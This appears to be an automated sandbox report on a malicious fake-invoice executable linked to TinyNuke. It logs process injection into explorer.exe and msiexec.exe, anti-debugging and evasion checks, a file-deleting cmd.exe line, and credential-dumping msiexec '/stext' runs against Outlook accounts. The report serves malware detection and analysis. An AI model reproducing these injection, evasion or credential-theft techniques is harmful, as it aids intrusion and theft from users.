Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeProcess created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exeJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del /f /q %temp%\gif*Jump to behavior
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'Jump to behavior
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Reads the Windows registered owner settingsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpWindow found: window name: TMainFormJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: facture_1398665.exeStatic file information: File size 2153784 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: facture_1398665.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: C:\Users\user\Desktop\Project\TinyNuke\Bin\Bot.pdb source: firefox.exe
Source: Binary string: C:\Users\user\Desktop\Project\TinyNuke\Bin\int32.pdb source: firefox.exe, 00000006.00000002.12877277547.0039D000.00000004.sdmp, dllhost.exe, 00000008.00000000.12873746576.000A0000.00000040.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL< source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: firefox.exe, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: is-6FJQD.tmp.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: firefox.exe, is-8PSLE.tmp.3.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: firefox.exe, api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: firefox.exe, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: ucrtbase.pdb source: firefox.exe, is-6FJQD.tmp.3.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: firefox.exe, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: is-599GA.tmp.3.dr
Source: Binary string: msvcr110.i386.pdb source: is-5UL7D.tmp.3.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: firefox.exe, is-437NP.tmp.3.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: firefox.exe, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\browser\app\firefox.pdb source: firefox.exe, 00000004.00000000.12816996658.01376000.00000002.sdmp, firefox.exe, 00000005.00000000.12824767482.00FC6000.00000002.sdmp, firefox.exe, 00000006.00000000.12824745977.00FC6000.00000002.sdmp, firefox.exe.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb-- source: is-599GA.tmp.3.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: is-437NP.tmp.3.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: is-8PSLE.tmp.3.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: firefox.exe, api-ms-win-core-timezone-l1-1-0.dll.4.dr

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory allocated: C:\Windows\explorer.exe base: 5330000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory allocated: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 400000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 400000 protect: page execute and read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5330000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5330000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5331000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5331000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5348000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5348000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5351000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 5351000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 53B6000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 53B6000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 53B7000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 53B7000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 1EB0020 protect: page execute and read and writeJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory protected: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and writeJump to behavior
Contains functionality to inject threads in other processesShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00382712 VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WriteProcessMemory,WriteProcessMemory,GetVersionExA,CreateRemoteThread,RtlCreateUserThread,6_2_00382712
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\explorer.exe EIP: 1EB0020Jump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 5330000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 400000 value starts with: 4D5AJump to behavior
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 5330000 value: 4DJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 5331000 value: 55Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 5348000 value: 70Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 5351000 value: F6Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 53B6000 value: 00Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 53B7000 value: 00Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 1EB0000 value: 00Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 1376 base: 1EB0020 value: 55Jump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\System32\dllhost.exeThread register set: target process: 1916Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread register set: target process: 2224Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: A0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: A1000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: B8000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: C1000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: 126000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: 127000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: 50000Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeMemory written: C:\Windows\System32\dllhost.exe base: 50020Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 5330000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 5331000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 5348000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 5351000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 53B6000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 53B7000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 1EB0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 1EB0020Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 400000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 401000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 445000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 400000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 451000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 401000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 454000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 413000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 417000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FFD9008Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 419000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FFD8008Jump to behavior
Contains functionality to launch a program with higher privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004D8F68 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_004D8F68
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\facture_1398665.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeProcess created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exeJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del /f /q %temp%\gif*Jump to behavior
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'Jump to behavior
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'Jump to behavior
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00480E38 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_00480E38
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004B8A78 GetVersion,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree,3_2_004B8A78
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: dllhost.exe, 00000008.00000002.13106432822.005C0000.00000002.sdmpBinary or memory string: Progman
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmpBinary or memory string: Shell_TrayWnd*
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpBinary or memory string: Shell_TrayWnd[
Source: dllhost.exe, 00000008.00000002.13106432822.005C0000.00000002.sdmpBinary or memory string: Program Manager
Source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp, firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmpBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_is-7i2ss.tmp_1f55c2dc497036d9.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_01356B21 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_01356B21
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00389812 RtlEncodePointer,RtlEncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,6_2_00389812
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697FE6B0 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C5_2_697FE6B0
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004A1A3C LoadLibraryExW,LoadLibraryW,GetProcAddress,3_2_004A1A3C
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69779678 mov eax, dword ptr fs:[00000030h]5_2_69779678
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_01356C80 SetUnhandledExceptionFilter,4_2_01356C80
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_01356B21 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_01356B21
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_01356810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_01356810
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0C8D65 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E0C8D65
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D644D _crt_debugger_hook,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,4_2_6E0D644D
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0D52D5 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E0D52D5
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA6C80 SetUnhandledExceptionFilter,5_2_00FA6C80
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA6810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00FA6810
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_00FA6B21 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00FA6B21
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69788DA0 __report_gsfailure,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_69788DA0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697952D5 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_697952D5
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00386A66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00386A66

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
Checks the free space of harddrivesShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpJump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
